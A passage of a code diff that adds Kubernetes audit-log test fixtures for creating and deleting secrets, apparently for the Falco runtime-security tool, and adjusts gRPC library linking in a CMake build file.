+{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"55a81824-ab56-46c5-8b02-96336f5e78d7","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/default/secrets","verb":"create","user":{"username":"minikube-user","groups":["system:masters","system:authenticated"]},"sourceIPs":["192.168.64.1"],"userAgent":"kubectl/v1.17.3 (darwin/amd64) kubernetes/06ad960","objectRef":{"resource":"secrets","namespace":"default","name":"example-secret","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestReceivedTimestamp":"2020-04-21T17:57:05.541358Z","stageTimestamp":"2020-04-21T17:57:05.548299Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}
+

test/trace_files/k8s_audit/create_service_account_token_secret.json

@@ -0,0 +1 @@
+{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"40ed7b5a-e92f-49ec-a359-86d36077d9c8","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/test2/secrets","verb":"create","user":{"username":"system:kube-controller-manager","groups":["system:authenticated"]},"sourceIPs":["127.0.0.1"],"userAgent":"kube-controller-manager/v1.17.3 (linux/amd64) kubernetes/06ad960/tokens-controller","objectRef":{"resource":"secrets","namespace":"test2","name":"default-token-7v4pb","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestReceivedTimestamp":"2020-04-21T17:32:29.939199Z","stageTimestamp":"2020-04-21T17:32:29.942468Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"system:kube-controller-manager\" of ClusterRole \"system:kube-controller-manager\" to User \"system:kube-controller-manager\""}}

test/trace_files/k8s_audit/delete_secret.json

@@ -0,0 +1 @@
+{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"d1df3fa9-497f-49cf-bd48-60a651df8075","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/default/secrets/example-secret","verb":"delete","user":{"username":"minikube-user","groups":["system:masters","system:authenticated"]},"sourceIPs":["192.168.64.1"],"userAgent":"kubectl/v1.17.3 (darwin/amd64) kubernetes/06ad960","objectRef":{"resource":"secrets","namespace":"default","name":"example-secret","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Success","code":200},"requestReceivedTimestamp":"2020-04-21T17:58:49.691845Z","stageTimestamp":"2020-04-21T17:58:49.696309Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}

userspace/falco/CMakeLists.txt

@@ -75,6 +75,7 @@ target_include_directories(
     "${YAMLCPP_INCLUDE_DIR}"
     "${CIVETWEB_INCLUDE_DIR}"
     "${GRPC_INCLUDE}"
+    "${GRPCPP_INCLUDE}"
     "${PROTOBUF_INCLUDE}"
     "${CMAKE_CURRENT_BINARY_DIR}"
     "${DRAIOS_DEPENDENCIES_DIR}/yaml-${DRAIOS_YAML_VERSION}/target/include")
@@ -83,8 +84,9 @@ target_link_libraries(
   falco
   falco_engine
   sinsp
-  "${GRPCPP_LIB}"
+  "${GPR_LIB}"
   "${GRPC_LIB}"
+  "${GRPCPP_LIB}"
   "${PROTOBUF_LIB}"
   "${LIBYAML_LIB}"
   "${YAMLCPP_LIB}"